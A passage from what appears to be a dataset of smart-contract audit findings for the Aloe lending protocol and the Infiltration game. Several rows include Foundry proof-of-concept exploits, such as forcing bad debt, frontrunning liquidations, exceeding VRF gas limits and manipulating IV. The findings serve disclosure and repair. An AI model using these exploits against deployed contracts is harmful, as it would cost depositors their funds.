HealingMustWaitAtLeastOneRound();\\n }\\n }\\n```\\n,User have to wait for 1 more round which led to the odds for an Agent to heal successfully start at 99% at Round 1 reduce to 98% at Round 2.,"```\\n function test_heal_in_next_round_v1() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(11);\\n\\n\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 12});\\n\\n address agentOwner = _ownerOf(woundedAgentIds[0]);\\n looks.mint(agentOwner, HEAL_BASE_COST);\\n\\n vm.startPrank(agentOwner);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, HEAL_BASE_COST);\\n\\n uint256[] memory agentIds = new uint256[](1);\\n agentIds[0] = woundedAgentIds[0];\\n\\n uint256[] memory costs = new uint256[](1);\\n costs[0] = HEAL_BASE_COST;\\n\\n //get gameInfo\\n (,,,,,uint40 currentRoundId,,,,,) = infiltration.gameInfo();\\n assert(currentRoundId == 13);\\n\\n //get agent Info\\n IInfiltration.Agent memory agentInfo = infiltration.getAgent(woundedAgentIds[0]);\\n assert(agentInfo.woundedAt == 12);\\n\\n //agent can't invoke heal in the next round.\\n vm.expectRevert(IInfiltration.HealingMustWaitAtLeastOneRound.selector);\\n infiltration.heal(agentIds);\\n }\\n```\\n" +fulfillRandomWords() could revert under certain circumstances,medium,"Crucial part of my POC is the variable AGENTS_TO_WOUND_PER_ROUND_IN_BASIS_POINTS. I communicated with the protocol's team that they plan to set it to 20 initially but it is possible to have a different value for it in future. For the POC i used 30.\\n```\\nfunction test_fulfillRandomWords_revert() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(48);\\n \\n uint256 counter = 0;\\n uint256[] memory wa = new uint256[](30);\\n uint256 totalCost = 0;\\n\\n for (uint256 j=2; j <= 6; j++) \\n {\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: j});\\n\\n uint256[] memory costs = new uint256[](woundedAgentIds.length);\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n costs[i] = HEAL_BASE_COST;\\n wa[counter] = woundedAgentIds[i];\\n counter++;\\n if(counter > 29) break;\\n }\\n\\n if(counter > 29) break;\\n }\\n \\n \\n totalCost = HEAL_BASE_COST * wa.length;\\n looks.mint(user1, totalCost);\\n\\n vm.startPrank(user1);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, totalCost);\\n\\n\\n infiltration.heal(wa);\\n vm.stopPrank();\\n\\n _drawXRounds(1);\\n }\\n```\\n\\nI put this test into Infiltration.startNewRound.t.sol and used --gas-report to see that the gas used for fulfillRandomWords exceeds 2 500 000.","A couple of ideas :\\nYou can limit the value of AGENTS_TO_WOUND_PER_ROUND_IN_BASIS_POINTS to a small enough number so that it is 100% sure it will not reach the gas limit.\\nConsider simply storing the randomness and taking more complex follow-on actions in separate contract calls as stated in the ""Security Considerations"" section of the VRF's docs.",DOS of the protocol and inability to continue the game.,"```\\nfunction test_fulfillRandomWords_revert() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(48);\\n \\n uint256 counter = 0;\\n uint256[] memory wa = new uint256[](30);\\n uint256 totalCost = 0;\\n\\n for (uint256 j=2; j <= 6; j++) \\n {\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: j});\\n\\n uint256[] memory costs = new uint256[](woundedAgentIds.length);\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n costs[i] = HEAL_BASE_COST;\\n wa[counter] = woundedAgentIds[i];\\n counter++;\\n if(counter > 29) break;\\n }\\n\\n if(counter > 29) break;\\n }\\n \\n \\n totalCost = HEAL_BASE_COST * wa.length;\\n looks.mint(user1, totalCost);\\n\\n vm.startPrank(user1);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, totalCost);\\n\\n\\n infiltration.heal(wa);\\n vm.stopPrank();\\n\\n _drawXRounds(1);\\n }\\n```\\n" +Oracle.sol: manipulation via increasing Uniswap V3 pool observationCardinality,high,"The `Oracle.consult` function takes a `uint40 seed` parameter and can be used in either of two ways:\\nSet the highest 8 bit to a non-zero value to use Uniswap V3's binary search to get observations\\nSet the highest 8 bit to zero and use the lower 32 bits to provide hints and use the more efficient internal `Oracle.observe` function to get the observations\\nThe code for Aloe's `Oracle.observe` function is adapted from Uniswap V3's Oracle library.\\nTo understand this issue it is necessary to understand Uniswap V3's `observationCardinality` concept.\\nA deep dive can be found here.\\nIn short, it is a circular array of variable size. The size of the array can be increased by ANYONE via calling `Pool.increaseObservationCardinalityNext`.\\nThe Uniswap V3 `Oracle.write` function will then take care of actually expanding the array once the current index has reached the end of the array.\\nAs can be seen in this function, uninitialized entries in the array have their timestamp set to `1`.\\nAnd all other values in the observation struct (array element) are set to zero:\\n```\\nstruct Observation {\\n // the block timestamp of the observation\\n uint32 blockTimestamp;\\n // the tick accumulator, i.e. tick * time elapsed since the pool was first initialized\\n int56 tickCumulative;\\n // the seconds per liquidity, i.e. seconds elapsed / max(1, liquidity) since the pool was first initialized\\n uint160 secondsPerLiquidityCumulativeX128;\\n // whether or not the observation is initialized\\n bool initialized;\\n}\\n```\\n\\nHere's an example for a simplified array to illustrate how the Aloe `Oracle.observe` function might read an invalid value:\\n```\\nAssume we are looking for the target=10 timestamp.\\n\\nAnd the observations array looks like this (element values are timestamps):\\n\\n| 12 | 20 | 25 | 30 | 1 | 1 | 1 |\\n\\nThe length of the array is 7.\\n\\nLet's say we provide the index 6 as the seed and the current observationIndex is 3 (i.e. pointing to timestamp 30)\\n\\nThe Oracle.observe function then chooses 1 as the left timestamp and 12 as the right timestamp.\\n\\nThis means the invalid and uninitialized element at index 6 with timestamp 1 will be used to calculate the Oracle values.\\n```\\n\\nHere is the section of the `Oracle.observe` function where the invalid element is used to calculate the result.\\nBy updating the observations (e.g. swaps in the Uniswap pool), an attacker can influence the value that is written on the left of the array, i.e. he can arrange for a scenario such that he can make the Aloe `Oracle` read a wrong value.\\nUpstream this causes the Aloe `Oracle` to continue calculation with `tickCumulatives` and `secondsPerLiquidityCumulativeX128s` haing a corrupted value. Either `secondsPerLiquidityCumulativeX128s[0]`, `tickCumulatives[0]` AND `secondsPerLiquidityCumulativeX128s[1]`, `tickCumulatives[1]` or only `secondsPerLiquidityCumulativeX128s[0]`, `tickCumulatives[0]` are assigned invalid values (depending on what the timestamp on the left of the array is).",The `Oracle.observe` function must not consider observations as valid that have not been initialized.\\nThis means the `initialized` field must be queried here and here and must be skipped over.,"The corrupted values are then used in the further calculations in `Oracle.consult` which reports its results upstream to `VolatilityOracle.update` and `VolatilityOracle.consult`, making their way into the core application.\\nThe TWAP price can be inflated such that bad debt can be taken on due to inflated valuation of Uniswap V3 liqudity.\\nBesides that there are virtually endless possibilities for an attacker to exploit this scenario since the Oracle is at the very heart of the Aloe application and it's impossible to foresee all the permutations of values that a determined attacker may use.\\nE.g. the TWAP price is used for liquidations where an incorrect TWAP price can lead to profit. If the protocol expects you to exchange 1 BTC for 10k USDC, then you end up with ~20k profit.\\nSince an attacker can make this scenario occur on purpose by updating the Uniswap observations (e.g. by executing swaps) and increasing observation cardinality, the severity of this finding is ""High"".","```\\nstruct Observation {\\n // the block timestamp of the observation\\n uint32 blockTimestamp;\\n // the tick accumulator, i.e. tick * time elapsed since the pool was first initialized\\n int56 tickCumulative;\\n // the seconds per liquidity, i.e. seconds elapsed / max(1, liquidity) since the pool was first initialized\\n uint160 secondsPerLiquidityCumulativeX128;\\n // whether or not the observation is initialized\\n bool initialized;\\n}\\n```\\n" +It is possible to frontrun liquidations with self liquidation with high strain value to clear warning and keep unhealthy positions from liquidation,high,"`Borrower.warn` sets the time when the liquidation (involving swap) can happen:\\n```\\nslot0 = slot0_ | ((block.timestamp + LIQUIDATION_GRACE_PERIOD) << 208);\\n```\\n\\nBut `Borrower.liquidation` clears the warning regardless of whether account is healthy or not after the repayment:\\n```\\n_repay(repayable0, repayable1);\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n```\\n\\nThe scenario above is demonstrated in the test, add this to Liquidator.t.sol:\\n```\\nfunction test_liquidationFrontrun() public {\\n uint256 margin0 = 1595e18;\\n uint256 margin1 = 0;\\n uint256 borrows0 = 0;\\n uint256 borrows1 = 1e18 * 100;\\n\\n // Extra due to rounding up in liabilities\\n margin0 += 1;\\n\\n deal(address(asset0), address(account), margin0);\\n deal(address(asset1), address(account), margin1);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, borrows1);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(lender1.borrowBalance(address(account)), borrows1);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n assertEq(asset1.balanceOf(address(account)), borrows1 + margin1);\\n\\n _setInterest(lender0, 10100);\\n _setInterest(lender1, 10100);\\n\\n account.warn((1 << 32));\\n\\n uint40 unleashLiquidationTime = uint40((account.slot0() 208) % (1 << 40));\\n assertEq(unleashLiquidationTime, block.timestamp + LIQUIDATION_GRACE_PERIOD);\\n\\n skip(LIQUIDATION_GRACE_PERIOD + 1);\\n\\n // listen for liquidation, or be the 1st in the block when warning is cleared\\n // liquidate with very high strain, basically keeping the position, but clearing the warning\\n account.liquidate(this, bytes(""""), 1e10, (1 << 32));\\n\\n unleashLiquidationTime = uint40((account.slot0() 208) % (1 << 40));\\n assertEq(unleashLiquidationTime, 0);\\n\\n // the liquidation command we've frontrun will now revert (due to warning not set: ""Aloe: grace"")\\n vm.expectRevert();\\n account.liquidate(this, bytes(""""), 1, (1 << 32));\\n}\\n```\\n","Consider clearing ""warn"" status only if account is healthy after liquidation.","Very important protocol function (liquidation) can be DOS'ed and make the unhealthy accounts avoid liquidations for a very long time. Malicious users can thus open huge risky positions which will then go into bad debt causing loss of funds for all protocol users as they will not be able to withdraw their funds and can cause a bank run - first users will be able to withdraw, but later users won't be able to withdraw as protocol won't have enough funds for this.",```\\nslot0 = slot0_ | ((block.timestamp + LIQUIDATION_GRACE_PERIOD) << 208);\\n```\\n +"`Borrower`'s `modify`, `liquidate` and `warn` functions use stored (outdated) account liabilities which makes it possible for the user to intentionally put him into bad debt in 1 transaction",high,"Possible scenario for the intentional creation of bad debt:\\nBorrow max amount at max leverage + some safety margin so that position is healthy for the next few days, for example borrow 10000 DAI, add margin of 1051 DAI for safety (51 DAI required for `MAX_LEVERAGE`, 1000 DAI safety margin)\\nWait for a long period of market inactivity (such as 1 day).\\nAt this point `borrowBalance` is greater than `borrowBalanceStored` by a value higher than `MAX_LEVERAGE` (example: `borrowBalance` = 10630 DAI, `borrowBalanceStored` = 10000 DAI)\\nCall `modify` and withdraw max possible amount (based on borrowBalanceStored), for example, withdraw 1000 DAI (remaining assets = 10051 DAI, which is healthy based on stored balance of 10000 DAI, but in fact this is already a bad debt, because borrow balance is 10630, which is more than remaining assets). This works, because liabilities used are outdated.\\nAt this point the user is already in bad debt, but due to points 1-2, it's still not liquidatable. After calling `Lender.accrueInterest` the account can be liquidated. This bad debt caused is the funds lost by the other users.\\nThis scenario is not profitable to the malicious user, but can be modified to make it profitable: the user can deposit large amount to lender before these steps, meaning the inflated interest rate will be accured by user's deposit to lender, but it will not be paid by the user due to bad debt (user will deposit 1051 DAI, withdraw 1000 DAI, and gain some share of accured 630 DAI, for example if he doubles the lender's TVL, he will gain 315 DAI - protocol fees).\\nThe scenario above is demonstrated in the test, create test/Exploit.t.sol:\\n```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.17;\\n\\nimport ""forge-std/Test.sol"";\\n\\nimport {MAX_RATE, DEFAULT_ANTE, DEFAULT_N_SIGMA, LIQUIDATION_INCENTIVE} from ""src/libraries/constants/Constants.sol"";\\nimport {Q96} from ""src/libraries/constants/Q.sol"";\\nimport {zip} from ""src/libraries/Positions.sol"";\\n\\nimport ""src/Borrower.sol"";\\nimport ""src/Factory.sol"";\\nimport ""src/Lender.sol"";\\nimport ""src/RateModel.sol"";\\n\\nimport {FatFactory, VolatilityOracleMock} from ""./Utils.sol"";\\n\\ncontract RateModelMax is IRateModel {\\n uint256 private constant _A = 6.1010463348e20;\\n\\n uint256 private constant _B = _A / 1e18;\\n\\n /// @inheritdoc IRateModel\\n function getYieldPerSecond(uint256 utilization, address) external pure returns (uint256) {\\n unchecked {\\n return (utilization < 0.99e18) ? _A / (1e18 - utilization) - _B : MAX_RATE;\\n }\\n }\\n}\\n\\ncontract ExploitTest is Test, IManager, ILiquidator {\\n IUniswapV3Pool constant pool = IUniswapV3Pool(0xC2e9F25Be6257c210d7Adf0D4Cd6E3E881ba25f8);\\n ERC20 constant asset0 = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);\\n ERC20 constant asset1 = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n\\n Lender immutable lender0;\\n Lender immutable lender1;\\n Borrower immutable account;\\n\\n constructor() {\\n vm.createSelectFork(vm.rpcUrl(""mainnet""));\\n vm.rollFork(15_348_451);\\n\\n Factory factory = new FatFactory(\\n address(0),\\n address(0),\\n VolatilityOracle(address(new VolatilityOracleMock())),\\n new RateModelMax()\\n );\\n\\n factory.createMarket(pool);\\n (lender0, lender1, ) = factory.getMarket(pool);\\n account = factory.createBorrower(pool, address(this), bytes12(0));\\n }\\n\\n function setUp() public {\\n // deal to lender and deposit (so that there are assets to borrow)\\n deal(address(asset0), address(lender0), 10000e18); // DAI\\n deal(address(asset1), address(lender1), 10000e18); // WETH\\n lender0.deposit(10000e18, address(12345));\\n lender1.deposit(10000e18, address(12345));\\n\\n deal(address(account), DEFAULT_ANTE + 1);\\n }\\n\\n function test_selfLiquidation() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 51e18 + 1000e18;\\n uint256 borrows0 = 10000e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n\\n // skip 1 day (without transactions)\\n skip(86400);\\n\\n emit log_named_uint(""User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""User stored borrow:"", lender0.borrowBalanceStored(address(account)));\\n\\n // withdraw all the ""extra"" balance putting account into bad debt\\n bytes memory data2 = abi.encode(Action.WITHDRAW, 1000e18, 0);\\n account.modify(this, data2, (1 << 32));\\n\\n // account is still not liquidatable (because liquidation also uses stored liabilities)\\n vm.expectRevert();\\n account.warn((1 << 32));\\n\\n // make account liquidatable by settling accumulated interest\\n lender0.accrueInterest();\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""""), 1, (1 << 32));\\n\\n emit log_named_uint(""Before liquidation User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""Before liquidation User stored borrow:"", lender0.borrowBalanceStored(address(account)));\\n emit log_named_uint(""Before liquidation User assets:"", asset0.balanceOf(address(account)));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(""Liquidated User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""Liquidated User assets:"", asset0.balanceOf(address(account)));\\n }\\n\\n enum Action {\\n WITHDRAW,\\n BORROW,\\n UNI_DEPOSIT\\n }\\n\\n // IManager\\n function callback(bytes calldata data, address, uint208) external returns (uint208 positions) {\\n require(msg.sender == address(account));\\n\\n (Action action, uint256 amount0, uint256 amount1) = abi.decode(data, (Action, uint256, uint256));\\n\\n if (action == Action.WITHDRAW) {\\n account.transfer(amount0, amount1, address(this));\\n } else if (action == Action.BORROW) {\\n account.borrow(amount0, amount1, msg.sender);\\n } else if (action == Action.UNI_DEPOSIT) {\\n account.uniswapDeposit(-75600, -75540, 200000000000000000);\\n positions = zip([-75600, -75540, 0, 0, 0, 0]);\\n }\\n }\\n\\n // ILiquidator\\n receive() external payable {}\\n\\n function swap1For0(bytes calldata data, uint256 actual, uint256 expected0) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, false, -int256(expected0), TickMath.MAX_SQRT_RATIO - 1, bytes(""""));\\n }\\n\\n function swap0For1(bytes calldata data, uint256 actual, uint256 expected1) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, true, -int256(expected1), TickMath.MIN_SQRT_RATIO + 1, bytes(""""));\\n }\\n\\n // IUniswapV3SwapCallback\\n function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {\\n if (amount0Delta > 0) asset0.transfer(msg.sender, uint256(amount0Delta));\\n if (amount1Delta > 0) asset1.transfer(msg.sender, uint256(amount1Delta));\\n }\\n\\n // Factory mock\\n function getParameters(IUniswapV3Pool) external pure returns (uint248 ante, uint8 nSigma) {\\n ante = DEFAULT_ANTE;\\n nSigma = DEFAULT_N_SIGMA;\\n }\\n\\n // (helpers)\\n function _setInterest(Lender lender, uint256 amount) private {\\n bytes32 ID = bytes32(uint256(1));\\n uint256 slot1 = uint256(vm.load(address(lender), ID));\\n\\n uint256 borrowBase = slot1 % (1 << 184);\\n uint256 borrowIndex = slot1 184;\\n\\n uint256 newSlot1 = borrowBase + (((borrowIndex * amount) / 10_000) << 184);\\n vm.store(address(lender), ID, bytes32(newSlot1));\\n }\\n}\\n```\\n\\nExecution console log:\\n```\\n User borrow:: 10629296791890000000000\\n User stored borrow:: 10000000000000000000000\\n Before liquidation User borrow:: 10630197795010000000000\\n Before liquidation User stored borrow:: 10630197795010000000000\\n Before liquidation User assets:: 10051000000000000000000\\n Liquidated User borrow:: 579197795010000000001\\n Liquidated User assets:: 0\\n```\\n\\nAs can be seen, in the end user debt is 579 DAI with 0 assets.",Consider using `borrowBalance` instead of `borrowBalanceStored` in `_getLiabilities()`.,"Malicious user can create bad debt to his account in 1 transaction. Bad debt is the amount not withdrawable from the lender by users who deposited. Since users will know that the lender doesn't have enough assets to pay out to all users, it can cause bank run since first users to withdraw from lender will be able to do so, while those who are the last to withdraw will lose their funds.","```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.17;\\n\\nimport ""forge-std/Test.sol"";\\n\\nimport {MAX_RATE, DEFAULT_ANTE, DEFAULT_N_SIGMA, LIQUIDATION_INCENTIVE} from ""src/libraries/constants/Constants.sol"";\\nimport {Q96} from ""src/libraries/constants/Q.sol"";\\nimport {zip} from ""src/libraries/Positions.sol"";\\n\\nimport ""src/Borrower.sol"";\\nimport ""src/Factory.sol"";\\nimport ""src/Lender.sol"";\\nimport ""src/RateModel.sol"";\\n\\nimport {FatFactory, VolatilityOracleMock} from ""./Utils.sol"";\\n\\ncontract RateModelMax is IRateModel {\\n uint256 private constant _A = 6.1010463348e20;\\n\\n uint256 private constant _B = _A / 1e18;\\n\\n /// @inheritdoc IRateModel\\n function getYieldPerSecond(uint256 utilization, address) external pure returns (uint256) {\\n unchecked {\\n return (utilization < 0.99e18) ? _A / (1e18 - utilization) - _B : MAX_RATE;\\n }\\n }\\n}\\n\\ncontract ExploitTest is Test, IManager, ILiquidator {\\n IUniswapV3Pool constant pool = IUniswapV3Pool(0xC2e9F25Be6257c210d7Adf0D4Cd6E3E881ba25f8);\\n ERC20 constant asset0 = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);\\n ERC20 constant asset1 = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n\\n Lender immutable lender0;\\n Lender immutable lender1;\\n Borrower immutable account;\\n\\n constructor() {\\n vm.createSelectFork(vm.rpcUrl(""mainnet""));\\n vm.rollFork(15_348_451);\\n\\n Factory factory = new FatFactory(\\n address(0),\\n address(0),\\n VolatilityOracle(address(new VolatilityOracleMock())),\\n new RateModelMax()\\n );\\n\\n factory.createMarket(pool);\\n (lender0, lender1, ) = factory.getMarket(pool);\\n account = factory.createBorrower(pool, address(this), bytes12(0));\\n }\\n\\n function setUp() public {\\n // deal to lender and deposit (so that there are assets to borrow)\\n deal(address(asset0), address(lender0), 10000e18); // DAI\\n deal(address(asset1), address(lender1), 10000e18); // WETH\\n lender0.deposit(10000e18, address(12345));\\n lender1.deposit(10000e18, address(12345));\\n\\n deal(address(account), DEFAULT_ANTE + 1);\\n }\\n\\n function test_selfLiquidation() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 51e18 + 1000e18;\\n uint256 borrows0 = 10000e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n\\n // skip 1 day (without transactions)\\n skip(86400);\\n\\n emit log_named_uint(""User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""User stored borrow:"", lender0.borrowBalanceStored(address(account)));\\n\\n // withdraw all the ""extra"" balance putting account into bad debt\\n bytes memory data2 = abi.encode(Action.WITHDRAW, 1000e18, 0);\\n account.modify(this, data2, (1 << 32));\\n\\n // account is still not liquidatable (because liquidation also uses stored liabilities)\\n vm.expectRevert();\\n account.warn((1 << 32));\\n\\n // make account liquidatable by settling accumulated interest\\n lender0.accrueInterest();\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""""), 1, (1 << 32));\\n\\n emit log_named_uint(""Before liquidation User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""Before liquidation User stored borrow:"", lender0.borrowBalanceStored(address(account)));\\n emit log_named_uint(""Before liquidation User assets:"", asset0.balanceOf(address(account)));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(""Liquidated User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""Liquidated User assets:"", asset0.balanceOf(address(account)));\\n }\\n\\n enum Action {\\n WITHDRAW,\\n BORROW,\\n UNI_DEPOSIT\\n }\\n\\n // IManager\\n function callback(bytes calldata data, address, uint208) external returns (uint208 positions) {\\n require(msg.sender == address(account));\\n\\n (Action action, uint256 amount0, uint256 amount1) = abi.decode(data, (Action, uint256, uint256));\\n\\n if (action == Action.WITHDRAW) {\\n account.transfer(amount0, amount1, address(this));\\n } else if (action == Action.BORROW) {\\n account.borrow(amount0, amount1, msg.sender);\\n } else if (action == Action.UNI_DEPOSIT) {\\n account.uniswapDeposit(-75600, -75540, 200000000000000000);\\n positions = zip([-75600, -75540, 0, 0, 0, 0]);\\n }\\n }\\n\\n // ILiquidator\\n receive() external payable {}\\n\\n function swap1For0(bytes calldata data, uint256 actual, uint256 expected0) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, false, -int256(expected0), TickMath.MAX_SQRT_RATIO - 1, bytes(""""));\\n }\\n\\n function swap0For1(bytes calldata data, uint256 actual, uint256 expected1) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, true, -int256(expected1), TickMath.MIN_SQRT_RATIO + 1, bytes(""""));\\n }\\n\\n // IUniswapV3SwapCallback\\n function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {\\n if (amount0Delta > 0) asset0.transfer(msg.sender, uint256(amount0Delta));\\n if (amount1Delta > 0) asset1.transfer(msg.sender, uint256(amount1Delta));\\n }\\n\\n // Factory mock\\n function getParameters(IUniswapV3Pool) external pure returns (uint248 ante, uint8 nSigma) {\\n ante = DEFAULT_ANTE;\\n nSigma = DEFAULT_N_SIGMA;\\n }\\n\\n // (helpers)\\n function _setInterest(Lender lender, uint256 amount) private {\\n bytes32 ID = bytes32(uint256(1));\\n uint256 slot1 = uint256(vm.load(address(lender), ID));\\n\\n uint256 borrowBase = slot1 % (1 << 184);\\n uint256 borrowIndex = slot1 184;\\n\\n uint256 newSlot1 = borrowBase + (((borrowIndex * amount) / 10_000) << 184);\\n vm.store(address(lender), ID, bytes32(newSlot1));\\n }\\n}\\n```\\n" +IV Can be Decreased for Free,high,"The liquidity at a single `tickSpacing` is used to calcualte the `IV`. The more liquidity is in this tick spacing, the lower the `IV`, as demonstarated by the `tickTvl` dividing the return value of the `estimate` function:\\n```\\n return SoladyMath.sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.timestamp - a.timestamp) / tickTvl);\\n```\\n\\nSince this is using data only from the block that the function is called, the liuquidyt can easily be increased by:\\ndepositing a large amount liquidity into the `tickSpacing`\\ncalling update\\nremoving the liquidity\\nNote that only a small portion of the total liquidity is in the entire pool is in the active liquidity tick. Therefore, the capital cost required to massively increase the liquidity is low. Additionally, the manipulation has zero cost (aside from gas fees), as no trading is done through the pool. Contract this with a pool price manipulation, which costs a significant amount of trading fees to trade through a large amount of the liquidity of the pool.\\nSince this manipulation costs nothing except gas, the `IV_CHANGE_PER_UPDATE` which limits of the amount that IV can be manipulated per update does not sufficiently disincentivise manipulation, it just extends the time period required to manipulate.\\nDecreasing the IV increases the LTV, and due to the free cost, its reasonable to increase the LTV to the max LTV of 90% even for very volatile assets. Aloe uses the IV to estimate the probability of insolvency of loans. With the delay inherent in TWAP oracle and the liquidation delay by the warn-then-liquidate process, this manipulation can turn price change based insolvency from a 5 sigma event (as designed by the protocol) to a likely event.","Use the time weighted average liquidity of in-range ticks of the recent past, so that single block + single tickSpacing liquidity deposits cannot manipulate IV significantly.",Decreasing IV can be done at zero cost aside from gas fees.\\nThis can be used to borrow assets at far more leverage than the proper LTV\\nBorrowers can use this to avoid liquidation\\nThis also breaks the insolvency estimation based on IV for riskiness of price-change caused insolvency.,```\\n return SoladyMath.sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.timestamp - a.timestamp) / tickTvl);\\n```\\n +governor can permanently prevent withdrawals in spite of being restricted,medium,"Quoting from the Contest README:\\n```\\nIs the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\n\\nRestricted. The governor address should not be able to steal funds or prevent users from withdrawing. It does have access to the govern methods in Factory, and it could trigger liquidations by increasing nSigma. We consider this an acceptable risk, and the governor itself will have a timelock.\\n```\\n\\nThe mechanism by which users are ensured that they can withdraw their funds is the interest rate which increases with utilization.\\nMarket forces will keep the utilization in balance such that when users want to withdraw their funds from the `Lender` contracts, the interest rate increases and Borrowers pay back their loans (or get liquidated).\\nWhat the `governor` is allowed to do is to set a interest rate model via the `Factory.governMarketConfig` function.\\nThis clearly shows that the `governor` should be very much restricted in setting the `RateModel` such as to not damage users of the protocol which is in line with how the `governor` role is described in the README.\\nHowever the interest rate can be set to zero even if the utilization is very high. If Borrowers can borrow funds for a zero interest rate, they will never pay back their loans. This means that users in the Lenders will never be able to withdraw their funds.\\nIt is also noteworthy that the timelock that the governor uses won't be able to prevent this scenario since even if users withdraw their funds as quickly as possible, there will probably not be enough time / availability of funds for everyone to withdraw in time (assuming a realistic timelock length).","The `SafeRateLib` should ensure that as the utilization approaches `1e18` (100%), the interest rate cannot be below a certain minimum value.\\nThis ensures that even if the `governor` behaves maliciously or uses a broken `RateModel`, Borrowers will never borrow all funds without paying them back.",The `governor` is able to permanently prevent withdrawals from the Lenders which it should not be able to do according to the contest README.,"```\\nIs the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\n\\nRestricted. The governor address should not be able to steal funds or prevent users from withdrawing. It does have access to the govern methods in Factory, and it could trigger liquidations by increasing nSigma. We consider this an acceptable risk, and the governor itself will have a timelock.\\n```\\n" +Uniswap Formula Drastically Underestimates Volatilty,medium,"Note: This report will use annualised IV expressed in % will be use, even though the code representation uses different scaling.\\nAloe estimates implied volatility based on the article cited below (taken from in-line code comments)\\nLambert's article describes a method of valuing Uniswap liquidity positions based on volatility. It is correct to say that the expected value of holding an LP position can be determined by the formula referenced in the article. A liquidity position can be valued with the same as ""selling a straddle"" which is a short-volatility strategy which involves selling both a put and a call. Lambert does this by representing fee collection as an options premium and impermanat loss as the cost paid by the seller when the underlying hits the strike price. If the implied volatility of a uniswap position is above the fair IV, then it is profitable to be a liquidity provider, if it is lower, than it is not.\\nKEY POINT: However, this does not mean that re-arranging the formula to derive IV gives a correct estimation of IV.\\nThe assumptions of the efficient market hypothesis holds true only when there is a mechanism and incentive for rational actors to arbitrage the value of positions to fair value. There is a direct mechanism to push down the IV of Uniswap liquidity positions - if the IV is too high then providing liquidity is +EV, so rational actors would deposit liquidity, and thus the IV as calculated by Aloe's formula will decrease.\\nHowever, when the `IV` derived from Uniswap fees and liquidity is too low, there is no mechanism for rational actors to profit off correcting this. If you are not already a liquidity provider, there is 